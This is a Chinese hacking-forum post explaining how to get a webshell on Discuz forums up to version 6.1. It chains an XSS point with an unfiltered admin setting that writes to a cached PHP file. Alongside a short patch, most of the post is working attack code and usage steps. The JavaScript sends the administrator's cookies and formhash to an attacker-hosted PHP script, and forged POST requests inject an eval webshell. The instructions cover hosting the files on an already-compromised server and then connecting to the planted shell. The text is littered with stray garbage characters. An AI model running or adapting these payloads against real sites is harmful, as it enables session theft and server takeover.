Discuz XSS得webshell9 Z8 C8 t, ]& }) ] w% s3 ^
By racle @tian6.com- Q$ N3 E! o! d- j: X, ?
欢迎转帖.但请保留版权信息.
6 i1 c! i- K8 r8 h. }& h受影响版本 iscuz<=6.1.0,gbk+utf+big53 h E s# l! n* Z; o8 P
% Z% v- D5 C: {新增加完全JS利用版本,只有一个文件.ajax-racle.js.有效版本提升至DZ6.1(理论上7.0版本都可以,但是6.1以上版本都已经默认打上补丁),新增浏览器版本判断,对方浏览器为IE或FIREFOX都有效.
' J6 d2 s( J" \0 v j: ~
( v v& `- G, S/ R. b& H) F- T' m2 L! }# ]+ V t' v& [% D
3天前有朋友在论坛问过,说Discuz有个非论坛创始人获得WEBSHELL的漏洞,是superhei早前发出来的一大堆DISCUZ漏洞之一.见原帖:http://bbs.tian6.com/redirect.ph ... 54794&ptid=8706; C9 ]2 S- r! f1 \: F5 O, B
当时我说一会就弄出来给大家,但是实际上一接触,发现这个漏洞本身需要管理员后台权限,要广泛普遍的利用还是很复杂的,主要是以下几个问题,所以拖到今天才基本完工., a! p. u7 q+ A* w
' t4 o5 w6 \. j- { Y分析和写EXP的过程中,得到t0by57,Superhei的大力帮助.他们PHP和JS都不错的哦!希望大家看这篇文章时,更注意分析和明白的过程,毕竟XSS是目前WEB安全的最大头戏.各种形式:XSIO,Cross Iframe Trick,crsf等等..
/ T& ^: @# @. w i本帖补充其中一个FLASH XSS应用方法:配合Discuz得shell-Flash XSS- `. O. j3 a0 I+ M5 g" a I
7 @, K! p# I. o$ D r, i4 f- f! R- p' w/ O; G A( X
----------------------------------------------------------前言分隔线-----------------------------------------------------------------------------6 l) z: J/ {& Y4 d+ p- G
) m) C% {# `# A8 Q ^- A% r4 C# k( Z$ y! b+ H0 u
problem1:漏洞页面runwizard.inc.php数据提交方式为post.需要模拟POST提交.
1 N; V8 g0 \. x( I$ ^$ M' k+ a5 ~* T5 I! x8 K q* M& c& @2 b
problem2 ISCUZ论坛在数据提交的时候还验证了referer,因此还要伪造一下.php socket和js都可以伪造referer.# [; Q$ p: }& p
( I: g9 Y2 [7 H5 }7 `. t
problem3:formhash()函数采用了用户名+密码+XXX的算法得出,程序本身没办法模拟算出来,于是又耗费了我一段时间,最终想到个傻办法,从源代码里读出来.呵呵.这里是参考了superhei的一个旧EXP想出来的.
9 \( V; G, O; T8 @5 Z; m
( D+ @4 `% F- Z# Z u+ N; m
- y6 C" C, m, `/ P下面,我为大家简单说说这个漏洞的成因和补的办法.这里是有漏洞的文件代码:bbs/admin/runwizard.inc.php,里面有个函数function saverunwizardhistory() {
3 Q% R* L- A8 {' T$ X
6 B! ^' O ^! \6 I global $runwizardfile, $runwizardhistory;
4 O! B* Z( d$ Y! ^9 Z) p) s+ I' y
: o* u/ ]! J% f, X $fp = fopen($runwizardfile, 'w');
/ M( Z+ N5 f3 i# B0 v# C( {6 p1 G z$ m% u
fwrite($fp, serialize($runwizardhistory));
* K+ j9 W7 H% K+ k- V+ Y( P
6 l0 R: h! ` J9 R8 z) M) |) M fclose($fp);
5 P% o7 I5 a& {8 h, |" [; B6 q) k$ {" a
/ x) P6 I5 @6 X# I}& [5 w% {) I6 z" H
复制代码serialize($runwizardhistory)直接就写进$fp里.runwizardhistory是什么呢?是论坛一些基本的配置信息,譬如论坛名.反应在论坛后台,位置是:discuz.com/bbs/admincp.php?action=runwizard&step=2.论坛名称,地址等三项信息都没任何过滤.该三项内容任何一项都可以直接写入一句话,提交,然后保存在缓存:bbs/forumdata/logs/runwizardlog.php里.1 ~5 c+ c5 \; h% r. x* q
以下是修补的办法:function saverunwizardhistory() {% ~6 Q+ q+ G" L1 h
- n2 J; R/ F: v global $runwizardfile, $runwizardhistory;
# U7 v) U" _& d+ b) C7 n/ {" B* m/ a) g: f2 O' A! o
$fp = fopen($runwizardfile, 'w');
. u W8 J# |7 g% g0 U: N! N: x) I- R. I& a
$s = '<?php exit;?>';* V8 H8 A0 B2 z7 ^: a: v9 I
$ f) d/ P6 E4 x: j2 G/ U4 O6 ]
$s .= serialize($runwizardhistory);8 L3 D+ W5 q+ i( k5 l# x
I% U' b4 O3 ]; A7 ]: [8 U0 G) Z7 G( s fwrite($fp, $s);2 N) X3 s5 n4 b& \
( V) _" B/ w% S' j
fclose($fp);
9 T- C! n" ^" m2 d* h! f/ D$ F7 F
}7 M r! M) Q' h6 D, B
复制代码加写 '<?php exit;?>';到最前面,退出并且忽略该文件后面所有PHP代码.这么即使里面有一句话,也不能再被执行.
) {" W* o4 V5 S1 s: ?5 Y9 f5 j1 l+ {, Z7 [- Y% L, R
3 x; |7 V; U2 O: V; e9 q. R- k& I2 z+ c7 j( j! {5 V6 X
----------------------------------------漏洞的成因和利用方法分隔线-----------------------------------------------------------------------------2 o: R8 R% q* Z8 W1 X' y$ D1 ]
9 V5 Q* b3 _( l4 b- K, j5 Q8 e5 p9 E7 B
以上是该漏洞的成因和利用方法.大家看到这里,估计也认为这是个鸡肋漏洞了吧,首先要有管理员权限,有后台权限,然后才能上WEBSHELL,实话说,有后台权限,拿SHELL的办法也并不止这一个.所以这个洞的价值,看起来就不大了.当然,这个已经被发布的nday不是我本帖要讲的重点.这里我主要是想告诉大家,将XSS,Crsf和本漏洞联合起来的办法.这样该洞价值就大很多了.
9 B- `- O% l7 ]" p4 ]5 T5 z" d B4 f; O" b& b
我们的思路是:论坛上有个xss点,Crsf flash(的确有,Discuz! member.php xss bug,Discuz! 数据库错误信息xss bug,Discuz! flash Crsf bug,Discuz! admincp.php xss bug,Discuz![flash] xss bug),管理员点击或浏览后,就执行了我们的JS,带他到外部一个JS中,通过JS获得他的COOKIES,获得他的HASH,然后经过外部一个PHP封装SOCKET以POST的形式提交前面说的动作,如果论坛没有补上该问题(目前没几个论坛补了.当然,天阳已经补了.^^),那么就会产生bbs/forumdata/logs/runwizardlog.php这个WEBSHELL.0 |( k; ^8 H0 ^
. K. L& v% X0 n$ `这篇文章主要不是给大家个EXP,然后让大家拿着到处乱黑的,主要是讲方法,讲思路.因为这里学问不少.
4 z3 n# }* M* { Z" U. ?! ?5 ]3 w2 s X( k! H$ E
首先我们要看,怎么通过JS,获得管理员COOKIES,然后把COOKIES传递给最终提交的PHP.获得的办法相信大家都知道,但是传递的办法,譬如以图片形式传递,就非常稳定和实用.是实现AJAX本地语言到服务器语言PHP的好办法.JS部分代码:8 C7 `% G/ d# c: s
6 V3 v9 g! ]# c/ l }7 d
var url="http://目标网站/admincp.php";
1 ]; K( n8 F. L1 z4 H. G/ ~9 I
& u' V% x$ a( U8 V0 \0 q/*获得cookies*/9 _+ O' S; |5 k% }% [ \" P' e
* ^& x P9 X! y P6 c/ ?
function getURL(s) {
- N. K5 N- N$ B* M+ O
, A7 C' E, ]# a6 cvar image = new Image();
5 ]3 `0 A1 _% q2 j# {6 b$ n" C+ x& m( d2 {# X% |; l- f9 G
image.style.width = 0;
% M1 e/ G$ W5 v2 c6 k2 Y. {2 C* D6 A
image.style.height = 0;
' N) D% w: ?8 s- c6 g4 ?3 ^3 O% b/ u: x2 C+ O" f7 j( ^) S
image.src = s;( u; `0 @: @' @
1 I J R4 D; ` V2 N8 q}
h5 X% `6 V( b3 B) K7 v) T6 q% w. {' ^0 B2 j
getURL("我们做好的接收cookies的.php?x="+encodeURIComponent(document.cookie)); //这里就通过image变量传给了php
; B9 ^; _, Z0 L! ~* ^复制代码php以get方式接收过来的变量.$cookies=$_GET['x'];
/ ^! w& Y4 M g$ b复制代码同理,hash我也是这么传到PHP里.不过HASH的获得方法也是很有意思的,众所周知,discuz有formhash来保护每个授权访问的唯一性.但是你也可以发现,在论坛页面用户退出的地方,引用了这个hash.我们要做的,就是从页面的源文件里搜索出hash,筛选出来,传递给PHP即可.筛选的办法很多,你有兴趣的话,可以看看我的筛选JS代码(而且这里discuz其实还留了一手,呵呵) 
0 o4 K! O9 f* W
& M0 k3 h( j5 e0 I9 K ~* g; ]1 ]
3 p+ n4 x O- l( X0 P$ u0 Y获得了cookies和hash以后,我们需要结合完整数据,做一次模拟提交,大家可以看看,这个是我之前写好的AJAX提交方式:var url="http://tian6.com/raclebbs/";' P, @' v) U5 E p; h
( [$ r( J! d0 H: Y# d8 K' G
_1 ]6 h7 Z; M, c1 n8 i* N; }7 ?7 ~. j# ]0 Z" l: Y8 R7 C! z
/*hash*/, u5 q2 l( w/ E6 O6 t* Z9 S
$ a* J% N* G" B( yvar xmlHttpReq = new ActiveXObject("MSXML2.XMLHTTP.3.0");; [* U* j; h% W5 r0 p
# V4 F( L, y/ r, {
xmlHttpReq.open("GET", url+"admincp.php?action=home", false);: D1 o0 t' _0 x( G
" y/ _+ f* L0 F5 x0 w* uxmlHttpReq.send();
8 o: u$ a; N+ @6 m% I6 J
1 L# B, d% B. Avar resource = xmlHttpReq.responseText;
4 Z1 V7 z% U* U7 j0 k- ?% C
. [4 R( {" D+ Y" Cvar numero = resource.search(/formhash/);9 l: v) {1 c4 o4 q3 j
. ~+ v3 L' z% [var formhash=encodeURIComponent(resource.substr(numero+17,8));( u, K2 [7 M4 v3 T
, h1 A, l `/ L, S% q1 {/ M
% {6 w$ F- Y* I' v, T: d1 W+ i* r5 C& X9 D& h4 l# W7 L
var post="formhash="+formhash+"&anchor=&settingsnew%5Bbbname%5D=1&settingsnew%5Bsitename%5D=<%3Fphp+eval(%24_POST[racle])%3F>racle%40tian6.com&settingsnew%5Bsiteurl%5D=http%3A%2F%2Fwww.comsenz.com%2F&step2submit=%E4%B8%8B%E4%B8%80%E6%AD%A5";//构造要携带的数据
3 B4 ?7 n5 A+ C0 c6 v
* @7 d. W% C! @, P; W% txmlHttpReq.open(" OST",url+"admincp.php?action=runwizard&step=3",false);//使用POST方法打开一个到服务器的连接,以异步方式通信 / R- v. M3 [: ]
; S* m7 ?3 }& [
xmlHttpReq.setRequestHeader("Referer", url);
1 q, r2 i; }& S* J& G, K
6 m6 D$ K, x {9 ~( B( |6 ~# gxmlHttpReq.setrequestheader("Accept","image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, */*");) R7 ~4 t+ A2 B( v6 a Q- Z) \
) }7 K, f/ P% Q+ w, @1 |
xmlHttpReq.setrequestheader("content-length",post.length);
* C( _: E% k# o" A
9 t: H( Z" p( G: o# W# V) ZxmlHttpReq.setrequestheader("content-type","application/x-www-form-urlencoded"); ' O% A$ k) _/ b/ I: o
3 ^* q+ A7 Y" t# w9 ` qxmlHttpReq.send(post);//发送数据
9 K% m& D( i& [$ f* c* \复制代码这里HASH我假设正确,这样提交,也无须cookies7 r! z$ A* v+ @! C
3 L, b9 D1 J i" C: K
再看看以PHP SOCKET形式提交.$sock = fsockopen("$url", 80, $errno, $errstr, 30); v& R6 y1 }* U
' d3 W& W. H, Z2 H1 T4 Y) O0 e7 fif (!$sock) die("$errstr ($errno)\n");0 c5 Q# F6 U0 I5 t" I1 X
. J' D* ~' ]: a# \3 ?
$data = 'formhash='.$hash.'&anchor=&settingsnew%5Bbbname%5D=Discuz&settingsnew%5Bsitename%5D=<%3Fphp+eval(%24_POST[racle])%3F>racle%40tian6.com&settingsnew%5Bsiteurl%5D=http%3A%2F%2Fwww.comsenz.com%2F&step2submit=%E4%B8%8B%E4%B8%80%E6%AD%A5';
% A! P9 e4 Z! ]# K! }% Q# x! S1 M {# i6 E5 f5 T' P
0 l* y8 N1 z6 o, A! H) k
3 [* @% [! H3 w- A; zfwrite($sock, " OST http://$url/admincp.php?action=runwizard&step=3 HTTP/1.1\r\n");+ z' \0 n: v1 r8 k+ A1 B1 F$ ^
9 e* c; _* }: Z' j" S/ ~& ?
fwrite($sock, "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, */*\r\n");1 H; r% t/ ?. P8 i/ I
& g- K2 G) m! }; E# s- S
fwrite($sock, "Referer: http://$url/admincp.php?action=runwizard&step=2\r\n");
; _" G, a% M* w g& _+ R# R/ o/ g" x9 O" z) Q6 X" K9 v, s3 N2 I
fwrite($sock, "Accept-Language: zh-cn\r\n");
8 h+ w6 b. G) i5 u" q/ K
3 L1 ?8 i, R; {0 tfwrite($sock, "Content-Type: application/x-www-form-urlencoded\r\n");1 o. }9 U6 S/ T5 G! {; X- q6 A Y
, {5 v7 p. I# N; I0 I* Zfwrite($sock, "Accept-Encoding: gzip, deflate\r\n");2 _& T% X6 T" S6 P
2 E7 V7 l) ?7 w( h% @) e! J; ?" Ofwrite($sock, "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; User-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; http://bsalsa.com) ; User-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; http://bsalsa.com) (Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)); .NET CLR 1.1.4322; .NET CLR 2.0.50727)\r\n");: r4 I! v& n+ k2 p) R; H# e
1 U, W- {/ q6 `- S! Z. N3 g" jfwrite($sock, "Host: $url\r\n");
7 f8 A; l4 A' f* d' |( X( w3 | C& ?7 h0 ?; X$ h
fwrite($sock, "Content-Length: ".strlen($data)."\r\n");8 k1 y+ U B0 N ?. M
$ k! S( ~7 A4 {# q4 i" t0 s# F' \fwrite($sock, "Connection: Keep-Alive\r\n");
- g# U9 s# ?: w+ D U8 p, ~( l$ Z+ W0 v0 s; ]1 s c
fwrite($sock, "Cache-Control: no-cache\r\n");
! h4 {( H& E1 c: d. o
! E+ \8 h8 `1 O8 `; }fwrite($sock, "Cookie:".$cookies."\r\n\r\n");
) D0 l$ y0 `5 Q, c6 u
* f8 t& u6 M J) o% tfwrite($sock, $data);
, D: l- l3 }4 `! j, J w$ H6 v* S, { S- f1 [
) A: \' O+ ?' g& _/ m
. ^1 E- H. V( X: |6 b
$headers = "";& V; P- s( D+ C; T- p/ _
( ]$ N8 Q$ O' u0 A# m' O
while ($str = trim(fgets($sock, 4096)))2 m6 o$ p$ r4 O) K! ]' ?# \
: T3 }- x- v9 r $headers .= "$str\n";
7 V7 ]2 e8 g, H# V
! l# M ?$ d; becho "\n";
3 Y- G& Y) J+ y& w! Y% N4 ?. J7 K6 s, q1 F; j7 M
$body = "";
: [5 \8 [) w$ P! R7 b1 ?! u0 _& F1 d9 Q* [3 |0 C9 y+ _1 |
while (!feof($sock))
, Y& Y5 B$ Y O+ m" x( }- X
5 Z2 p* X+ v$ s. P: z $body .= fgets($sock, 4096);# T" o! e; r/ d( {" c, d, j
% M/ i+ H( O8 j' Ufclose($sock);+ M, t7 W& Q3 \* ~/ H7 x+ R/ ]
/ X8 c; h: {2 k' f5 v+ k) techo $body;; |( r2 ?" K* h+ B1 v
复制代码整个漏洞XSS应用大致如此,下面附上JS文件,PHP封装好的提交文件.利用文件限制一下,已注册用户才可以下载,刚来也没关系,仔细看看前面的分析,你也差不多能写出来.^^
7 V: x; j+ E l' b6 J+ z. V: b( ^7 u9 s6 e; Y; R
4 I9 O6 G# b' S
-------------------------------------------XSS文件分析分隔线-----------------------------------------------------------------------------, Q# R( ~# L1 ^% E) {! R
0 M5 n: A5 x8 F l! ]& A: {8 ?3 b
7 ~ k& R5 s( z# k4 |/ b: p1 HP SOCKET利用方法首先打开racle.js. M7 O2 a5 A `
3 }9 z' R8 W+ }5 M/ a! I
var url="http://tian6.com/raclebbs/admincp.php?action=home"; //改成你要XSS攻击的目标,譬如http://www.discuz.com/admincp.php?action=home. C% [+ G8 u2 C3 |5 f9 ^2 `; U/ e6 d
. L( u& T- P: C @5 k
$ q4 {# h' v3 H' G
0 N6 x) k; O. t5 S5 a2 o
然后打开racle@tian6.php
1 J2 D1 i/ o5 E1 }1 v0 @
! q+ O! r9 \( c$url="racle@tian6.com"; //改成你要XSS攻击的目标,譬如www.discuz.com
9 _: F: K/ I* d, W, X9 G s. I0 a5 w% }
3 _6 K2 B( S2 ^4 w8 O" X+ ?2 [" v, ]# @8 k: F
如果目标论坛为6.1版本,无须再改动.如果目标为6.0或以下版本,请修改:
. } X& d Y" V8 ~4 [2 v1 i" u5 ]" P0 ?+ b
getURL("racle@tian6.php?resource_hash="+encodeURIComponent(resource.substr(numero+17,8))+"&x="+encodeURIComponent(document.cookie));) Y' c: Y# c2 K" S/ C$ e8 ]
/ B! t0 C! r; z/ Y1 J9 e+ @为
) `. G6 I/ y( ?. q T$ Y9 T5 @' H# }( d1 F2 ~
getURL("racle@tian6.php?resource_hash="+encodeURIComponent(resource.substr(numero+9,8))+"&x="+encodeURIComponent(document.cookie));
& c8 S0 v1 G( s6 b7 A1 J1 ]复制代码2:JS利用方法打开ajax-racle.js,修改var url="http://tian6.com/raclebbs/";为你要攻击的论坛地址." P8 Q% h$ A2 B1 ~! `
3 |) p3 J& C+ P; [
3 w& x" W1 Y0 u5 v+ ~- S' l! _+ r9 }8 P
5 Y1 e0 O$ X* d, L% u+ `如果目标论坛为6.1版本,无须再改动.如果目标为6.0或以下版本,请修改:. d& S: b4 M; Y
' q: m& {6 O, y9 M7 [8 H# Z. M
var formhash=encodeURIComponent(resource.substr(numero+17,8));
- C5 y* {3 X& V& C7 f; `
- [$ V- \0 u! ^% U2 w5 Y为/ x( l$ I5 M- t$ S, n
5 |' H2 |/ l. R( x- ivar formhash=encodeURIComponent(resource.substr(numero+9,8));* q) `( W1 ]8 [* `4 I" v; s8 g7 {
复制代码ok.以上两种方法则其一.在攻击前,我们应该先看看论坛打上补丁没有,你可以尝试访问:http://target.com/bbs/forumdata/logs/runwizardlog.php,如果一片空白,那就没戏咯.不是空白就会有些论坛信息出现,但也不代表就肯定存在漏洞,因为可能人家补过之后没有更新过论坛信息而已.目前来说,有8成把握吧.
3 ?6 n4 \, @+ \" S( t0 }( Y# Q) |: l4 P
如果是第一种方法,就把racle.js,还有racle@tian6.php文件上传到一个可以执行PHP的地方,譬如你以前拿下的WEBSHELL里.两个文件需在同一目录下.记得该空间要支持PHP.然后在论坛以<script src=http://你放好的地方/racle.js></script>构造好XSS点.
; r* R) U+ j# g" W, S. M" ]$ T& ]
如果是第二种方法,就把ajax-racle.js,上传到一个你以前拿下的WEBSHELL里,然后在论坛以<script src=http://你放好的地方/ajax-racle.js></script>构造好XSS点.$ Q" ?8 c; j: j& x, c
a2 r+ c: {; [" Y
不管你用什么方法,等到管理员一点该连接或者浏览一下论坛,他论坛bbs/forumdata/logs/runwizardlog.php里就多了个<?php eval($_POST[racle])?> ^^.赶紧拿控制端连上去吧.
) P1 i! `' s9 O+ E Q& y. J
* U0 l. Q6 z8 A- w' B |